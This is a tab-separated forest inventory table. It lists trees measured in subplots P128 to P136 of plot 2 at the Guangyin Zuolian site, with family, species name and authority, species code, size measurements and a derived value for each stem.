Guangyin Zuolian	2	P128	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.7	7.19498e-05
Guangyin Zuolian	2	P128	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1.2	0.000118999
Guangyin Zuolian	2	P128	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	12	10	7	0.0613767
Guangyin Zuolian	2	P128	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	23	12	8	0.248834
Guangyin Zuolian	2	P128	Euphorbiaceae	Bischofia	Bischofia javanica Bl.	BISJAV	21	13	7	0.227013
Guangyin Zuolian	2	P128	Euphorbiaceae	Bischofia	Bischofia javanica Bl.	BISJAV	27	13	8	0.363707
Guangyin Zuolian	2	P128	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4	2.5	0.000864223
Guangyin Zuolian	2	P128	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	7	4	0.0201917
Guangyin Zuolian	2	P129	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	1.8	0.9	0.000842002
Guangyin Zuolian	2	P129	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	8	7	0.0418484
Guangyin Zuolian	2	P129	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	12	8	7	0.0492664
Guangyin Zuolian	2	P129	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	18	8	6	0.105393
Guangyin Zuolian	2	P129	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	9	8	0.0553266
Guangyin Zuolian	2	P129	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	30	9	7.8	0.308511
Guangyin Zuolian	2	P129	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	7	5.5	0.00320825
Guangyin Zuolian	2	P129	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	2	1.8	1.4	0.000393599
Guangyin Zuolian	2	P129	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	2.5	0.8	0.00116368
Guangyin Zuolian	2	P129	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	3	2.8	0.00238863
Guangyin Zuolian	2	P129	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	12	3	0.6	0.0187495
Guangyin Zuolian	2	P129	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	12	8	1.4	0.0492664
Guangyin Zuolian	2	P129	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	4.5	0.00472771
Guangyin Zuolian	2	P129	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	18	7	1	0.092404
Guangyin Zuolian	2	P129	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2.5	2.6	2	0.000859227
Guangyin Zuolian	2	P129	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2.8	2	0.00060821
Guangyin Zuolian	2	P130	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	4	3	2	0.00238863
Guangyin Zuolian	2	P130	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	8	5	3	0.0144958
Guangyin Zuolian	2	P130	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	1.5	0.5	0.0003289
Guangyin Zuolian	2	P130	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	1	2.5	1	0.00014825
Guangyin Zuolian	2	P130	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	4	2.5	1.5	0.00199599
Guangyin Zuolian	2	P130	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2.5	3	1.5	0.000989284
Guangyin Zuolian	2	P130	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15	7.5	1	0.0702585
Guangyin Zuolian	2	P130	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.5	8.96359e-05
Guangyin Zuolian	2	P130	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	3.5	2	0.00162093
Guangyin Zuolian	2	P130	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	3.5	1	0.00594767
Guangyin Zuolian	2	P130	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	5	2	0.0220291
Guangyin Zuolian	2	P130	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	23	8.5	5	0.177174
Guangyin Zuolian	2	P130	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	3	1.5	0.00238863
Guangyin Zuolian	2	P130	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	3.5	2	0.00594767
Guangyin Zuolian	2	P130	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	4	3.5	0.0116356
Guangyin Zuolian	2	P130	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	3.5	2.5	0.00594767
Guangyin Zuolian	2	P130	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	4	1.5	0.0067837
Guangyin Zuolian	2	P131	Sterculiaceae	Byttneria	Byttneria aspera Colebr.	BYTASP	3	8	6	0.00365921
Guangyin Zuolian	2	P131	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	2	4	3	0.000864223
Guangyin Zuolian	2	P131	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	3	5.5	4.5	0.00252993
Guangyin Zuolian	2	P131	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	4	6	5	0.00472771
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	4	2.5	0.0067837
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4.5	4	0.0020762
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	11	8	0.0783376
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	13	12	10	0.0853474
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	20	12	8	0.191457
Guangyin Zuolian	2	P131	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	29	12	8	0.384341
Guangyin Zuolian	2	P131	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	22	10	8.5	0.191299
Guangyin Zuolian	2	P131	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	6	7	5	0.011772
Guangyin Zuolian	2	P131	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1	0.000650978
Guangyin Zuolian	2	P131	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	6	4.5	4	0.00761816
Guangyin Zuolian	2	P131	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	3.5	1.5	0.000206502
Guangyin Zuolian	2	P131	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	4	1.5	0.000235529
Guangyin Zuolian	2	P131	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	26	12	10	0.313164
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	2	4	3	0.000864223
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	2	4	3	0.000864223
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	3	5	3.5	0.00230323
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	6	6	4.5	0.0101137
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	7	6	4.5	0.0135042
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	8	6	4.5	0.0173473
Guangyin Zuolian	2	P131	Sarcospermaceae	Sarcosperma	Sarcosperma arboreum Benth.	SARARB	11	7	5	0.0366909
Guangyin Zuolian	2	P131	Ebenaceae	Diospyros	Diospyros kaki Thunb	DIOKAK	3	2	0.5	0.000934077
Guangyin Zuolian	2	P131	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2	0.000650978
Guangyin Zuolian	2	P132	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	5	6	3	0.00718464
Guangyin Zuolian	2	P132	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	4.5	1.6	0.00097053
Guangyin Zuolian	2	P132	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	11	8.5	6	0.0444234
Guangyin Zuolian	2	P132	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	14	5	3	0.0414057
Guangyin Zuolian	2	P132	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	12	8	5.5	0.0492664
Guangyin Zuolian	2	P132	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.6	1.2	0.000350486
Guangyin Zuolian	2	P132	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	1.3	0.00043664
Guangyin Zuolian	2	P132	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	1.7	0.0013926
Guangyin Zuolian	2	P132	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	6	5	1.4	0.00845122
Guangyin Zuolian	2	P132	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	7	5.5	2.5	0.012395
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	5	3	0.00395057
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	6	2	0.0101137
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	8	1.6	0.0418484
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	2.5	0.0286909
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	10	1.5	0.0819525
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	11	3	0.115637
Guangyin Zuolian	2	P132	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	11.5	3	0.150677
Guangyin Zuolian	2	P132	Moraceae	Ficus	Ficus variegata var. chlorocarpa King	FICVAR	16	6	2	0.0636523
Guangyin Zuolian	2	P132	Moraceae	Ficus	Ficus variegata var. chlorocarpa King	FICVAR	24	9.5	6	0.214113
Guangyin Zuolian	2	P132	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	3	2	0.0013926
Guangyin Zuolian	2	P132	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	5	2.5	0.00395057
Guangyin Zuolian	2	P132	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	6	5.5	1.6	0.00928302
Guangyin Zuolian	2	P133	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	11	7.5	5	0.039271
Guangyin Zuolian	2	P133	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	4	2.5	0.000864223
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1	0.5	6.01228e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1	0.3	0.000128617
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.6	7.19498e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.2	0.5	7.19498e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.5	8.96359e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.4	8.96359e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.5	8.96359e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.6	8.96359e-05
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.6	1	0.000204338
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.7	0.5	0.000101396
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.7	0.5	0.000101396
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	0.7	0.000107269
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	1.3	0.000107269
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.8	0.7	0.000107269
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	0.8	0.000118999
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2	1	0.000254566
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2.2	0.5	0.000130711
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1	0.000317142
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	3	0.8	0.000177413
Guangyin Zuolian	2	P133	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1.6	0.000379528
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	3	1.5	0.00876455
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	4	1.5	0.00184878
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	8	5	0.0134267
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8	5	0.0349983
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	9	6	0.0322561
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	6	0.0393034
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	11	7	0.0674177
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	7	0.157128
Guangyin Zuolian	2	P133	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	13	7	0.0923484
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	4.6	2	0.00099177
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5	3	0.00395057
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	5.5	3	0.00252993
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	6	3	0.00718464
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	5	0.011772
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7	4.5	0.011772
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	9	7	1.5	0.0251831
Guangyin Zuolian	2	P133	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	10	9	5.5	0.0393034
Guangyin Zuolian	2	P134	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	23	8	6.5	0.166904
Guangyin Zuolian	2	P134	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.3	1.6	1.2	0.000156239
Guangyin Zuolian	2	P134	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	1.8	1.6	0.000229473
Guangyin Zuolian	2	P134	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	12	8	6	0.0492664
Guangyin Zuolian	2	P134	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	13	8	6	0.0572463
Guangyin Zuolian	2	P134	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	1.8	0.8	0.000842002
Guangyin Zuolian	2	P134	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	4	5	2	0.00395057
Guangyin Zuolian	2	P134	Euphorbiaceae	Sapium	Sapium discolor (Champ.) Muell.-Arg.	SAPDIS	12	8	6	0.0492664
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	2	1.8	1.6	0.000393599
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	4	2	0.00184878
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	3	4	2.5	0.00184878
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	4	5	2	0.00395057
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	18	5	3	0.0663377
Guangyin Zuolian	2	P134	Caprifoliaceae	Viburnum	Viburnum odoratissimum Ker.	VIBODO	15	6	4	0.0563957
Guangyin Zuolian	2	P134	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	6	5	0.0431209
Guangyin Zuolian	2	P134	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	6	3	0.0563957
Guangyin Zuolian	2	P134	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	8	5	0.0748697
Guangyin Zuolian	2	P134	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	9	4.5	0.0258628
Guangyin Zuolian	2	P134	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	25	9	8	0.219163
Guangyin Zuolian	2	P134	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	12	8	6	0.0492664
Guangyin Zuolian	2	P135	Euphorbiaceae	Mallotus	Mallotus paniculatus (Lam.) Muell.-Arg.	MALPAN	6	6.5	5	0.0109433
Guangyin Zuolian	2	P135	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.2	0.000650978
Guangyin Zuolian	2	P135	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	1	2	0.5	0.000118999
Guangyin Zuolian	2	P135	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	5	5	3.5	0.00600364
Guangyin Zuolian	2	P135	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	5	2	0.00230323
Guangyin Zuolian	2	P135	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	6.5	2.5	0.0109433
Guangyin Zuolian	2	P135	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	26	9.5	1.5	0.248794
Guangyin Zuolian	2	P135	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	25	10	7	0.243128
Guangyin Zuolian	2	P135	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	35	11	8	0.50196
Guangyin Zuolian	2	P135	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	8	5.5	3	0.0159225
Guangyin Zuolian	2	P135	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	5	6	3	0.00718464
Guangyin Zuolian	2	P135	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	14	6	4	0.0495507
Guangyin Zuolian	2	P135	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1	0.000118999
Guangyin Zuolian	2	P135	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1	0.000543971
Guangyin Zuolian	2	P135	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	12	7	0.5	0.0431948
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	5	2	0.00600364
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	7	6	2.5	0.0135042
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	6	1	0.0563957
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	8	5	0.0492664
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	10	4	0.207931
Guangyin Zuolian	2	P135	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	11	2	0.267058
Guangyin Zuolian	2	P135	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	1.5	0.5	0.0003289
Guangyin Zuolian	2	P135	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	1	2	0.5	0.000118999
Guangyin Zuolian	2	P135	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	3	2.5	1	0.00116368
Guangyin Zuolian	2	P135	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	5	4.5	3	0.00541185
Guangyin Zuolian	2	P135	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	8	4.5	2	0.0130669
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2.5	1.5	0.000543971
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	3.5	2	0.00278028
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	3.5	2	0.00594767
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	4	3	0.00481906
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	4	2	0.00905786
Guangyin Zuolian	2	P135	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	9	4.5	1	0.0162971
Guangyin Zuolian	2	P136	Palmae	Caryota	Caryota mitis	CARMIT	5	6.5	5	0.007774
Guangyin Zuolian	2	P136	Palmae	Caryota	Caryota mitis	CARMIT	16	12	9	0.125984
Guangyin Zuolian	2	P136	Mimosaceae	Adenanthera	Adenanthera pavonina L.	ADEPAV	5	4.5	3	0.00541185
Guangyin Zuolian	2	P136	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	5	5.5	3.5	0.00659455
Guangyin Zuolian	2	P136	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	7	4	0.00836267
Guangyin Zuolian	2	P136	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	7	6	0.0251831
Guangyin Zuolian	2	P136	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	26	10	8	0.261687
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	1	3	2.5	0.000177413
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	3.5	3	0.000757716
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	4	3	0.000864223
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	2	4	3.5	0.000864223
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	3	4	3	0.00184878
Guangyin Zuolian	2	P136	Sterculiaceae	Sterculia	Sterculia lanceolata Cav.	STELAN	5	5.5	4	0.00659455
Guangyin Zuolian	2	P136	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4.5	3	0.0020762
Guangyin Zuolian	2	P136	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3.5	1.5	0.000757716
Guangyin Zuolian	2	P136	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	2	4	2.5	0.000864223
Guangyin Zuolian	2	P136	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	3	4	2.5	0.00184878
Guangyin Zuolian	2	P136	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	4	4	2.5	0.00317108
Guangyin Zuolian	2	P136	Sapindaceae	Litchi	Litchi chinensis Sonn.	LITCHI	2	4.5	3	0.00097053
Guangyin Zuolian	2	P136	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	3	4	3	0.00184878
Guangyin Zuolian	2	P136	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	4	6	2.5	0.00472771
Guangyin Zuolian	2	P136	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	11	8	5	0.0418484
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	17	13	11	0.152734
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	18	13	11	0.170017
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	20	13	11	0.207162
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	23	13	11	0.269246
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	26	13.5	12	0.351686
Guangyin Zuolian	2	P136	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	28	13.5	12	0.404127
Guangyin Zuolian	2	P136	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	4	3	0.000864223
Guangyin Zuolian	2	P136	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	7	5	3	0.0112844
Guangyin Zuolian	2	P136	Ulmaceae	Celtis	Celtis tetrandra ssp. sinensis (Pers.) Y.C.Tang	CELTET	35	9	6.5	0.411936
